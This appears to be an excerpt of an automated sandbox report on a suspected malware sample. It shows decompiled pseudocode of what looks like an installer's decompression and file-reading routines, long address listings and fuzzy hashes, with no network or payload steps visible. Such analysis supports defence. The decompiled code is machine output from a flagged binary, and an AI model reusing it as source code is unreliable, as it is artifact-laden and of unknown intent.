                                                              											_t192 = __eax %  *(__ebp - 0x74);
                                                              											__eax = __eax /  *(__ebp - 0x74);
                                                              											__edx = _t192;
                                                              											goto L79;
                                                              										case 0x1b:
                                                              											L75:
                                                              											__eflags =  *(__ebp - 0x64);
                                                              											if( *(__ebp - 0x64) == 0) {
                                                              												 *(__ebp - 0x88) = 0x1b;
                                                              												goto L170;
                                                              											}
                                                              											__eax =  *(__ebp - 0x14);
                                                              											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                              											__eflags = __eax -  *(__ebp - 0x74);
                                                              											if(__eax >=  *(__ebp - 0x74)) {
                                                              												__eax = __eax +  *(__ebp - 0x74);
                                                              												__eflags = __eax;
                                                              											}
                                                              											__edx =  *(__ebp - 8);
                                                              											__cl =  *(__eax + __edx);
                                                              											__eax =  *(__ebp - 0x14);
                                                              											 *(__ebp - 0x5c) = __cl;
                                                              											 *(__eax + __edx) = __cl;
                                                              											__eax = __eax + 1;
                                                              											__edx = 0;
                                                              											_t274 = __eax %  *(__ebp - 0x74);
                                                              											__eax = __eax /  *(__ebp - 0x74);
                                                              											__edx = _t274;
                                                              											__eax =  *(__ebp - 0x68);
                                                              											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                              											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                              											_t283 = __ebp - 0x64;
                                                              											 *_t283 =  *(__ebp - 0x64) - 1;
                                                              											__eflags =  *_t283;
                                                              											 *( *(__ebp - 0x68)) = __cl;
                                                              											L79:
                                                              											 *(__ebp - 0x14) = __edx;
                                                              											goto L80;
                                                              										case 0x1c:
                                                              											while(1) {
                                                              												L123:
                                                              												__eflags =  *(__ebp - 0x64);
                                                              												if( *(__ebp - 0x64) == 0) {
                                                              													break;
                                                              												}
                                                              												__eax =  *(__ebp - 0x14);
                                                              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                              												__eflags = __eax -  *(__ebp - 0x74);
                                                              												if(__eax >=  *(__ebp - 0x74)) {
                                                              													__eax = __eax +  *(__ebp - 0x74);
                                                              													__eflags = __eax;
                                                              												}
                                                              												__edx =  *(__ebp - 8);
                                                              												__cl =  *(__eax + __edx);
                                                              												__eax =  *(__ebp - 0x14);
                                                              												 *(__ebp - 0x5c) = __cl;
                                                              												 *(__eax + __edx) = __cl;
                                                              												__eax = __eax + 1;
                                                              												__edx = 0;
                                                              												_t414 = __eax %  *(__ebp - 0x74);
                                                              												__eax = __eax /  *(__ebp - 0x74);
                                                              												__edx = _t414;
                                                              												__eax =  *(__ebp - 0x68);
                                                              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                              												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                              												__eflags =  *(__ebp - 0x30);
                                                              												 *( *(__ebp - 0x68)) = __cl;
                                                              												 *(__ebp - 0x14) = _t414;
                                                              												if( *(__ebp - 0x30) > 0) {
                                                              													continue;
                                                              												} else {
                                                              													L80:
                                                              													 *(__ebp - 0x88) = 2;
                                                              													goto L1;
                                                              												}
                                                              											}
                                                              											 *(__ebp - 0x88) = 0x1c;
                                                              											goto L170;
                                                              									}
                                                              								}
                                                              								L171:
                                                              								_t535 = _t534 | 0xffffffff;
                                                              								goto L172;
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              			}













                                                              0x00000000
                                                              0x00407068
                                                              0x00407068
                                                              0x0040706c
                                                              0x00407095
                                                              0x0040709f
                                                              0x0040706e
                                                              0x00407077
                                                              0x00407084
                                                              0x00407087
                                                              0x004073cb
                                                              0x004073cb
                                                              0x004073ce
                                                              0x004073ce
                                                              0x004073ce
                                                              0x004073d4
                                                              0x004073da
                                                              0x004073e0
                                                              0x004073fa
                                                              0x004073fd
                                                              0x00407403
                                                              0x0040740e
                                                              0x00407410
                                                              0x004073e2
                                                              0x004073e2
                                                              0x004073f1
                                                              0x004073f5
                                                              0x004073f5
                                                              0x0040741a
                                                              0x00000000
                                                              0x00000000
                                                              0x0040741c
                                                              0x00407420
                                                              0x004075cf
                                                              0x004075e5
                                                              0x004075ed
                                                              0x004075f4
                                                              0x004075f6
                                                              0x004075fd
                                                              0x00407601
                                                              0x00407601
                                                              0x0040742c
                                                              0x00407433
                                                              0x0040743b
                                                              0x0040743e
                                                              0x00407441
                                                              0x00407441
                                                              0x00407447
                                                              0x00407447
                                                              0x00406be3
                                                              0x00406be3
                                                              0x00406be3
                                                              0x00406bec
                                                              0x00000000
                                                              0x00000000
                                                              0x00406bf2
                                                              0x00000000
                                                              0x00406bfd
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c06
                                                              0x00406c09
                                                              0x00406c0c
                                                              0x00406c10
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c16
                                                              0x00406c19
                                                              0x00406c1b
                                                              0x00406c1c
                                                              0x00406c1f
                                                              0x00406c21
                                                              0x00406c22
                                                              0x00406c24
                                                              0x00406c27
                                                              0x00406c2c
                                                              0x00406c31
                                                              0x00406c3a
                                                              0x00406c4d
                                                              0x00406c50
                                                              0x00406c5c
                                                              0x00406c84
                                                              0x00406c86
                                                              0x00406c94
                                                              0x00406c94
                                                              0x00406c98
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c88
                                                              0x00406c88
                                                              0x00406c8b
                                                              0x00406c8c
                                                              0x00406c8c
                                                              0x00000000
                                                              0x00406c88
                                                              0x00406c62
                                                              0x00406c67
                                                              0x00406c67
                                                              0x00406c70
                                                              0x00406c78
                                                              0x00406c7b
                                                              0x00000000
                                                              0x00406c81
                                                              0x00406c81
                                                              0x00000000
                                                              0x00406c81
                                                              0x00000000
                                                              0x00406c9e
                                                              0x00406c9e
                                                              0x00406ca2
                                                              0x0040754e
                                                              0x00000000
                                                              0x0040754e
                                                              0x00406cab
                                                              0x00406cbb
                                                              0x00406cbe
                                                              0x00406cc1
                                                              0x00406cc1
                                                              0x00406cc1
                                                              0x00406cc4
                                                              0x00406cc8
                                                              0x00000000
                                                              0x00000000
                                                              0x00406cca
                                                              0x00406cd0
                                                              0x00406cfa
                                                              0x00406d00
                                                              0x00406d07
                                                              0x00000000
                                                              0x00406d07
                                                              0x00406cd6
                                                              0x00406cd9
                                                              0x00406cde
                                                              0x00406cde
                                                              0x00406ce9
                                                              0x00406cf1
                                                              0x00406cf4
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d39
                                                              0x00406d3f
                                                              0x00406d42
                                                              0x00406d4f
                                                              0x00406d57
                                                              0x004073cb
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d0e
                                                              0x00406d0e
                                                              0x00406d12
                                                              0x0040755d
                                                              0x00000000
                                                              0x0040755d
                                                              0x00406d1e
                                                              0x00406d29
                                                              0x00406d29
                                                              0x00406d29
                                                              0x00406d2c
                                                              0x00406d2f
                                                              0x00406d32
                                                              0x00406d37
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004073ce
                                                              0x004073ce
                                                              0x004073d4
                                                              0x004073da
                                                              0x004073e0
                                                              0x004073fa
                                                              0x004073fd
                                                              0x00407403
                                                              0x0040740e
                                                              0x00407410
                                                              0x004073e2
                                                              0x004073e2
                                                              0x004073f1
                                                              0x004073f5
                                                              0x004073f5
                                                              0x0040741a
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d5f
                                                              0x00406d61
                                                              0x00406d64
                                                              0x00406dd5
                                                              0x00406dd8
                                                              0x00406ddb
                                                              0x00406de2
                                                              0x00406dec
                                                              0x004073cb
                                                              0x004073cb
                                                              0x00000000
                                                              0x004073cb
                                                              0x004073cb
                                                              0x00406d66
                                                              0x00406d6a
                                                              0x00406d6d
                                                              0x00406d6f
                                                              0x00406d72
                                                              0x00406d75
                                                              0x00406d77
                                                              0x00406d7a
                                                              0x00406d7c
                                                              0x00406d81
                                                              0x00406d84
                                                              0x00406d87
                                                              0x00406d8b
                                                              0x00406d92
                                                              0x00406d95
                                                              0x00406d9c
                                                              0x00406da0
                                                              0x00406da8
                                                              0x00406da8
                                                              0x00406da8
                                                              0x00406da2
                                                              0x00406da2
                                                              0x00406da2
                                                              0x00406d97
                                                              0x00406d97
                                                              0x00406d97
                                                              0x00406dac
                                                              0x00406daf
                                                              0x00406dcd
                                                              0x00406dcf
                                                              0x00000000
                                                              0x00406db1
                                                              0x00406db1
                                                              0x00406db4
                                                              0x00406db7
                                                              0x00406dba
                                                              0x00406dbc
                                                              0x00406dbc
                                                              0x00406dbc
                                                              0x00406dbf
                                                              0x00406dc2
                                                              0x00406dc4
                                                              0x00406dc5
                                                              0x00406dc8
                                                              0x00000000
                                                              0x00406dc8
                                                              0x00000000
                                                              0x00406ffe
                                                              0x00407002
                                                              0x00407020
                                                              0x00407023
                                                              0x0040702a
                                                              0x0040702d
                                                              0x00407030
                                                              0x00407033
                                                              0x00407036
                                                              0x00407039
                                                              0x0040703b
                                                              0x00407042
                                                              0x00407043
                                                              0x00407045
                                                              0x00407048
                                                              0x0040704b
                                                              0x0040704e
                                                              0x0040704e
                                                              0x00407053
                                                              0x00000000
                                                              0x00407053
                                                              0x00407004
                                                              0x00407007
                                                              0x0040700a
                                                              0x00407014
                                                              0x004073cb
                                                              0x004073cb
                                                              0x00000000
                                                              0x004073cb
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004070ab
                                                              0x004070af
                                                              0x00000000
                                                              0x00000000
                                                              0x004070b5
                                                              0x004070b9
                                                              0x00000000
                                                              0x00000000
                                                              0x004070bf
                                                              0x004070c1
                                                              0x004070c5
                                                              0x004070c5
                                                              0x004070c8
                                                              0x004070cc
                                                              0x00000000
                                                              0x00000000
                                                              0x0040711c
                                                              0x00407120
                                                              0x00407127
                                                              0x0040712a
                                                              0x0040712d
                                                              0x00407137
                                                              0x004073cb
                                                              0x004073cb
                                                              0x00000000
                                                              0x004073cb
                                                              0x004073cb
                                                              0x00407122
                                                              0x00000000
                                                              0x00000000
                                                              0x00407143
                                                              0x00407147
                                                              0x0040714e
                                                              0x00407151
                                                              0x00407154
                                                              0x00407149
                                                              0x00407149
                                                              0x00407149
                                                              0x00407157
                                                              0x0040715a
                                                              0x0040715d
                                                              0x0040715d
                                                              0x00407160
                                                              0x00407163
                                                              0x00407166
                                                              0x00407166
                                                              0x00407169
                                                              0x00407170
                                                              0x00407175
                                                              0x00000000
                                                              0x00000000
                                                              0x00407203
                                                              0x00407203
                                                              0x00407207
                                                              0x004075a5
                                                              0x00000000
                                                              0x004075a5
                                                              0x0040720d
                                                              0x00407210
                                                              0x00407213
                                                              0x00407217
                                                              0x0040721a
                                                              0x00407220
                                                              0x00407222
                                                              0x00407222
                                                              0x00407222
                                                              0x00407225
                                                              0x00407228
                                                              0x00000000
                                                              0x00000000
                                                              0x00406df8
                                                              0x00406df8
                                                              0x00406dfc
                                                              0x00407569
                                                              0x00000000
                                                              0x00407569
                                                              0x00406e02
                                                              0x00406e05
                                                              0x00406e08
                                                              0x00406e0c
                                                              0x00406e0f
                                                              0x00406e15
                                                              0x00406e17
                                                              0x00406e17
                                                              0x00406e17
                                                              0x00406e1a
                                                              0x00406e1d
                                                              0x00406e1d
                                                              0x00406e20
                                                              0x00406e23
                                                              0x00000000
                                                              0x00000000
                                                              0x00406e29
                                                              0x00406e2f
                                                              0x00000000
                                                              0x00000000
                                                              0x00406e35
                                                              0x00406e35
                                                              0x00406e39
                                                              0x00406e3c
                                                              0x00406e3f
                                                              0x00406e42
                                                              0x00406e45
                                                              0x00406e46
                                                              0x00406e49
                                                              0x00406e4b
                                                              0x00406e51
                                                              0x00406e54
                                                              0x00406e57
                                                              0x00406e5a
                                                              0x00406e5d
                                                              0x00406e60
                                                              0x00406e63
                                                              0x00406e7f
                                                              0x00406e82
                                                              0x00406e85
                                                              0x00406e88
                                                              0x00406e8f
                                                              0x00406e93
                                                              0x00406e95
                                                              0x00406e99
                                                              0x00406e65
                                                              0x00406e65
                                                              0x00406e69
                                                              0x00406e71
                                                              0x00406e76
                                                              0x00406e78
                                                              0x00406e7a
                                                              0x00406e7a
                                                              0x00406e9c
                                                              0x00406ea3
                                                              0x00406ea6
                                                              0x00000000
                                                              0x00406eac
                                                              0x00000000
                                                              0x00406eac
                                                              0x00000000
                                                              0x00406eb1
                                                              0x00406eb1
                                                              0x00406eb5
                                                              0x00407575
                                                              0x00000000
                                                              0x00407575
                                                              0x00406ebb
                                                              0x00406ebe
                                                              0x00406ec1
                                                              0x00406ec5
                                                              0x00406ec8
                                                              0x00406ece
                                                              0x00406ed0
                                                              0x00406ed0
                                                              0x00406ed0
                                                              0x00406ed3
                                                              0x00406ed6
                                                              0x00406ed6
                                                              0x00406ed6
                                                              0x00406edc
                                                              0x00000000
                                                              0x00000000
                                                              0x00406ede
                                                              0x00406ee1
                                                              0x00406ee4
                                                              0x00406ee7
                                                              0x00406eea
                                                              0x00406eed
                                                              0x00406ef0
                                                              0x00406ef3
                                                              0x00406ef6
                                                              0x00406ef9
                                                              0x00406efc
                                                              0x00406f14
                                                              0x00406f17
                                                              0x00406f1a
                                                              0x00406f1d
                                                              0x00406f1d
                                                              0x00406f20
                                                              0x00406f24
                                                              0x00406f26
                                                              0x00406efe
                                                              0x00406efe
                                                              0x00406f06
                                                              0x00406f0b
                                                              0x00406f0d
                                                              0x00406f0f
                                                              0x00406f0f
                                                              0x00406f29
                                                              0x00406f30
                                                              0x00406f33
                                                              0x00000000
                                                              0x00406f35
                                                              0x00000000
                                                              0x00406f35
                                                              0x00406f33
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f75
                                                              0x00406f75
                                                              0x00406f79
                                                              0x00407581
                                                              0x00000000
                                                              0x00407581
                                                              0x00406f7f
                                                              0x00406f82
                                                              0x00406f85
                                                              0x00406f89
                                                              0x00406f8c
                                                              0x00406f92
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f97
                                                              0x00406f9a
                                                              0x00406f9a
                                                              0x00406fa0
                                                              0x00406f3e
                                                              0x00406f3e
                                                              0x00406f41
                                                              0x00000000
                                                              0x00406f41
                                                              0x00406fa2
                                                              0x00406fa2
                                                              0x00406fa5
                                                              0x00406fa8
                                                              0x00406fab
                                                              0x00406fae
                                                              0x00406fb1
                                                              0x00406fb4
                                                              0x00406fb7
                                                              0x00406fba
                                                              0x00406fbd
                                                              0x00406fc0
                                                              0x00406fd8
                                                              0x00406fdb
                                                              0x00406fde
                                                              0x00406fe1
                                                              0x00406fe1
                                                              0x00406fe4
                                                              0x00406fe8
                                                              0x00406fea
                                                              0x00406fc2
                                                              0x00406fc2
                                                              0x00406fca
                                                              0x00406fcf
                                                              0x00406fd1
                                                              0x00406fd3
                                                              0x00406fd3
                                                              0x00406fed
                                                              0x00406ff4
                                                              0x00406ff7
                                                              0x00000000
                                                              0x00406ff9
                                                              0x00000000
                                                              0x00406ff9
                                                              0x00000000
                                                              0x00407286
                                                              0x00407286
                                                              0x0040728a
                                                              0x004075b1
                                                              0x00000000
                                                              0x004075b1
                                                              0x00407290
                                                              0x00407293
                                                              0x00407296
                                                              0x0040729a
                                                              0x0040729d
                                                              0x004072a3
                                                              0x004072a5
                                                              0x004072a5
                                                              0x004072a5
                                                              0x004072a8
                                                              0x00000000
                                                              0x00000000
                                                              0x00407056
                                                              0x00407056
                                                              0x00407059
                                                              0x004073cb
                                                              0x004073cb
                                                              0x00000000
                                                              0x004073cb
                                                              0x00000000
                                                              0x00407395
                                                              0x00407399
                                                              0x004073bb
                                                              0x004073be
                                                              0x004073c8
                                                              0x004073cb
                                                              0x004073cb
                                                              0x00000000
                                                              0x004073cb
                                                              0x004073cb
                                                              0x0040739b
                                                              0x0040739e
                                                              0x004073a2
                                                              0x004073a5
                                                              0x004073a5
                                                              0x004073a8
                                                              0x00000000
                                                              0x00000000
                                                              0x00407452
                                                              0x00407456
                                                              0x00407474
                                                              0x00407474
                                                              0x00407474
                                                              0x0040747b
                                                              0x00407482
                                                              0x00407489
                                                              0x00407489
                                                              0x00000000
                                                              0x00407489
                                                              0x00407458
                                                              0x0040745b
                                                              0x0040745e
                                                              0x00407461
                                                              0x00407468
                                                              0x004073ac
                                                              0x004073ac
                                                              0x004073af
                                                              0x00000000
                                                              0x00000000
                                                              0x00407543
                                                              0x00407546
                                                              0x00407447
                                                              0x00000000
                                                              0x00000000
                                                              0x0040717d
                                                              0x0040717f
                                                              0x00407186
                                                              0x00407187
                                                              0x00407189
                                                              0x0040718c
                                                              0x00000000
                                                              0x00000000
                                                              0x00407194
                                                              0x00407197
                                                              0x0040719a
                                                              0x0040719c
                                                              0x0040719e
                                                              0x0040719e
                                                              0x0040719f
                                                              0x004071a2
                                                              0x004071a9
                                                              0x004071ac
                                                              0x004071ba
                                                              0x00000000
                                                              0x00000000
                                                              0x00407490
                                                              0x00407490
                                                              0x00407493
                                                              0x0040749a
                                                              0x00000000
                                                              0x00000000
                                                              0x0040749f
                                                              0x0040749f
                                                              0x004074a3
                                                              0x004075db
                                                              0x00000000
                                                              0x004075db
                                                              0x004074a9
                                                              0x004074ac
                                                              0x004074af
                                                              0x004074b3
                                                              0x004074b6
                                                              0x004074bc
                                                              0x004074be
                                                              0x004074be
                                                              0x004074be
                                                              0x004074c1
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c7
                                                              0x004074c7
                                                              0x004074cb
                                                              0x0040752b
                                                              0x0040752e
                                                              0x00407533
                                                              0x00407534
                                                              0x00407536
                                                              0x00407538
                                                              0x0040753b
                                                              0x00407447
                                                              0x00407447
                                                              0x00000000
                                                              0x0040744d
                                                              0x00407447
                                                              0x004074cd
                                                              0x004074d3
                                                              0x004074d6
                                                              0x004074d9
                                                              0x004074dc
                                                              0x004074df
                                                              0x004074e2
                                                              0x004074e5
                                                              0x004074e8
                                                              0x004074eb
                                                              0x004074ee
                                                              0x00407507
                                                              0x0040750a
                                                              0x0040750d
                                                              0x00407510
                                                              0x00407514
                                                              0x00407516
                                                              0x00407516
                                                              0x00407517
                                                              0x0040751a
                                                              0x004074f0
                                                              0x004074f0
                                                              0x004074f8
                                                              0x004074fd
                                                              0x004074ff
                                                              0x00407502
                                                              0x00407502
                                                              0x0040751d
                                                              0x00407524
                                                              0x00000000
                                                              0x00407526
                                                              0x00000000
                                                              0x00407526
                                                              0x00000000
                                                              0x004071c2
                                                              0x004071c5
                                                              0x004071fb
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732e
                                                              0x0040732e
                                                              0x00407331
                                                              0x00407333
                                                              0x004075bd
                                                              0x00000000
                                                              0x004075bd
                                                              0x00407339
                                                              0x0040733c
                                                              0x00000000
                                                              0x00000000
                                                              0x00407342
                                                              0x00407346
                                                              0x00407349
                                                              0x00407349
                                                              0x00407349
                                                              0x00000000
                                                              0x00407349
                                                              0x004071c7
                                                              0x004071c9
                                                              0x004071cb
                                                              0x004071cd
                                                              0x004071d0
                                                              0x004071d1
                                                              0x004071d3
                                                              0x004071d5
                                                              0x004071d8
                                                              0x004071db
                                                              0x004071f1
                                                              0x004071f6
                                                              0x0040722e
                                                              0x0040722e
                                                              0x00407232
                                                              0x0040725e
                                                              0x00407260
                                                              0x00407267
                                                              0x0040726a
                                                              0x0040726d
                                                              0x0040726d
                                                              0x00407272
                                                              0x00407272
                                                              0x00407274
                                                              0x00407277
                                                              0x0040727e
                                                              0x00407281
                                                              0x004072ae
                                                              0x004072ae
                                                              0x004072b1
                                                              0x004072b4
                                                              0x00407328
                                                              0x00407328
                                                              0x00407328
                                                              0x00000000
                                                              0x00407328
                                                              0x004072b6
                                                              0x004072bc
                                                              0x004072bf
                                                              0x004072c2
                                                              0x004072c5
                                                              0x004072c8
                                                              0x004072cb
                                                              0x004072ce
                                                              0x004072d1
                                                              0x004072d4
                                                              0x004072d7
                                                              0x004072f0
                                                              0x004072f2
                                                              0x004072f5
                                                              0x004072f6
                                                              0x004072f9
                                                              0x004072fb
                                                              0x004072fe
                                                              0x00407300
                                                              0x00407302
                                                              0x00407305
                                                              0x00407307
                                                              0x0040730a
                                                              0x0040730e
                                                              0x00407310
                                                              0x00407310
                                                              0x00407311
                                                              0x00407314
                                                              0x00407317
                                                              0x004072d9
                                                              0x004072d9
                                                              0x004072e1
                                                              0x004072e6
                                                              0x004072e8
                                                              0x004072eb
                                                              0x004072eb
                                                              0x0040731a
                                                              0x00407321
                                                              0x004072ab
                                                              0x004072ab
                                                              0x004072ab
                                                              0x004072ab
                                                              0x00000000
                                                              0x00407323
                                                              0x00000000
                                                              0x00407323
                                                              0x00407321
                                                              0x00407234
                                                              0x00407237
                                                              0x00407239
                                                              0x0040723c
                                                              0x0040723f
                                                              0x00407242
                                                              0x00407244
                                                              0x00407247
                                                              0x0040724a
                                                              0x0040724a
                                                              0x0040724d
                                                              0x0040724d
                                                              0x00407250
                                                              0x00407257
                                                              0x0040722b
                                                              0x0040722b
                                                              0x0040722b
                                                              0x0040722b
                                                              0x00000000
                                                              0x00407259
                                                              0x00000000
                                                              0x00407259
                                                              0x00407257
                                                              0x004071dd
                                                              0x004071e0
                                                              0x004071e2
                                                              0x004071e5
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f44
                                                              0x00406f44
                                                              0x00406f48
                                                              0x0040758d
                                                              0x00000000
                                                              0x0040758d
                                                              0x00406f4e
                                                              0x00406f51
                                                              0x00406f54
                                                              0x00406f57
                                                              0x00406f5a
                                                              0x00406f5d
                                                              0x00406f60
                                                              0x00406f62
                                                              0x00406f65
                                                              0x00406f68
                                                              0x00406f6b
                                                              0x00406f6d
                                                              0x00406f6d
                                                              0x00406f6d
                                                              0x00000000
                                                              0x00000000
                                                              0x004070cf
                                                              0x004070cf
                                                              0x004070d3
                                                              0x00407599
                                                              0x00000000
                                                              0x00407599
                                                              0x004070d9
                                                              0x004070dc
                                                              0x004070df
                                                              0x004070e2
                                                              0x004070e4
                                                              0x004070e4
                                                              0x004070e4
                                                              0x004070e7
                                                              0x004070ea
                                                              0x004070ed
                                                              0x004070f0
                                                              0x004070f3
                                                              0x004070f6
                                                              0x004070f7
                                                              0x004070f9
                                                              0x004070f9
                                                              0x004070f9
                                                              0x004070fc
                                                              0x004070ff
                                                              0x00407102
                                                              0x00407105
                                                              0x00407105
                                                              0x00407105
                                                              0x00407108
                                                              0x0040710a
                                                              0x0040710a
                                                              0x00000000
                                                              0x00000000
                                                              0x0040734c
                                                              0x0040734c
                                                              0x0040734c
                                                              0x00407350
                                                              0x00000000
                                                              0x00000000
                                                              0x00407356
                                                              0x00407359
                                                              0x0040735c
                                                              0x0040735f
                                                              0x00407361
                                                              0x00407361
                                                              0x00407361
                                                              0x00407364
                                                              0x00407367
                                                              0x0040736a
                                                              0x0040736d
                                                              0x00407370
                                                              0x00407373
                                                              0x00407374
                                                              0x00407376
                                                              0x00407376
                                                              0x00407376
                                                              0x00407379
                                                              0x0040737c
                                                              0x0040737f
                                                              0x00407382
                                                              0x00407385
                                                              0x00407389
                                                              0x0040738b
                                                              0x0040738e
                                                              0x00000000
                                                              0x00407390
                                                              0x0040710d
                                                              0x0040710d
                                                              0x00000000
                                                              0x0040710d
                                                              0x0040738e
                                                              0x004075c3
                                                              0x00000000
                                                              0x00000000
                                                              0x00406bf2
                                                              0x004075fa
                                                              0x004075fa
                                                              0x00000000
                                                              0x004075fa
                                                              0x00407447
                                                              0x004073ce
                                                              0x004073cb

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                              • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                                              • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                              • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 94%
                                                              			E00403479(intOrPtr _a4) {
                                                              				intOrPtr _t10;
                                                              				intOrPtr _t11;
                                                              				signed int _t12;
                                                              				void* _t14;
                                                              				void* _t15;
                                                              				long _t16;
                                                              				void* _t18;
                                                              				intOrPtr _t19;
                                                              				intOrPtr _t31;
                                                              				long _t32;
                                                              				intOrPtr _t34;
                                                              				intOrPtr _t36;
                                                              				void* _t37;
                                                              				intOrPtr _t49;
                                                              
                                                              				_t32 =  *0x420ef4; // 0x788b
                                                              				_t34 = _t32 -  *0x40ce60 + _a4;
                                                              				 *0x42a26c = GetTickCount() + 0x1f4;
                                                              				if(_t34 <= 0) {
                                                              					L22:
                                                              					E0040302E(1);
                                                              					return 0;
                                                              				}
                                                              				E004035F8( *0x420f04);
                                                              				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
                                                              				 *0x420f00 = _t34;
                                                              				 *0x420ef0 = 0;
                                                              				while(1) {
                                                              					_t10 =  *0x420ef8; // 0x15f578
                                                              					_t31 = 0x4000;
                                                              					_t11 = _t10 -  *0x420f04;
                                                              					if(_t11 <= 0x4000) {
                                                              						_t31 = _t11;
                                                              					}
                                                              					_t12 = E004035E2(0x414ef0, _t31);
                                                              					if(_t12 == 0) {
                                                              						break;
                                                              					}
                                                              					 *0x420f04 =  *0x420f04 + _t31;
                                                              					 *0x40ce80 = 0x414ef0;
                                                              					 *0x40ce84 = _t31;
                                                              					L6:
                                                              					L6:
                                                              					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
                                                              						_t19 =  *0x420f00; // 0x3a12d
                                                              						 *0x420ef0 = _t19 -  *0x420ef4 - _a4 +  *0x40ce60;
                                                              						E0040302E(0);
                                                              					}
                                                              					 *0x40ce88 = 0x40cef0;
                                                              					 *0x40ce8c = 0x8000; // executed
                                                              					_t14 = E00406BB0(0x40ce68); // executed
                                                              					if(_t14 < 0) {
                                                              						goto L20;
                                                              					}
                                                              					_t36 =  *0x40ce88; // 0x40d54f
                                                              					_t37 = _t36 - 0x40cef0;
                                                              					if(_t37 == 0) {
                                                              						__eflags =  *0x40ce84; // 0x0
                                                              						if(__eflags != 0) {
                                                              							goto L20;
                                                              						}
                                                              						__eflags = _t31;
                                                              						if(_t31 == 0) {
                                                              							goto L20;
                                                              						}
                                                              						L16:
                                                              						_t16 =  *0x420ef4; // 0x788b
                                                              						if(_t16 -  *0x40ce60 + _a4 > 0) {
                                                              							continue;
                                                              						}
                                                              						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
                                                              						goto L22;
                                                              					}
                                                              					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
                                                              					if(_t18 == 0) {
                                                              						_push(0xfffffffe);
                                                              						L21:
                                                              						_pop(_t15);
                                                              						return _t15;
                                                              					}
                                                              					 *0x40ce60 =  *0x40ce60 + _t37;
                                                              					_t49 =  *0x40ce84; // 0x0
                                                              					if(_t49 != 0) {
                                                              						goto L6;
                                                              					}
                                                              					goto L16;
                                                              					L20:
                                                              					_push(0xfffffffd);
                                                              					goto L21;
                                                              				}
                                                              				return _t12 | 0xffffffff;
                                                              			}

















                                                              0x0040347c
                                                              0x00403489
                                                              0x0040349c
                                                              0x004034a1
                                                              0x004035d1
                                                              0x004035d3
                                                              0x00000000
                                                              0x004035d9
                                                              0x004034ad
                                                              0x004034c0
                                                              0x004034c6
                                                              0x004034cc
                                                              0x004034d7
                                                              0x004034d7
                                                              0x004034dc
                                                              0x004034e1
                                                              0x004034e9
                                                              0x004034eb
                                                              0x004034eb
                                                              0x004034f4
                                                              0x004034fb
                                                              0x00000000
                                                              0x00000000
                                                              0x00403501
                                                              0x00403507
                                                              0x0040350d
                                                              0x00000000
                                                              0x00403513
                                                              0x00403519
                                                              0x00403523
                                                              0x00403539
                                                              0x0040353e
                                                              0x00403543
                                                              0x00403549
                                                              0x0040354f
                                                              0x00403559
                                                              0x00403560
                                                              0x00000000
                                                              0x00000000
                                                              0x00403562
                                                              0x00403568
                                                              0x0040356a
                                                              0x0040358d
                                                              0x00403593
                                                              0x00000000
                                                              0x00000000
                                                              0x00403595
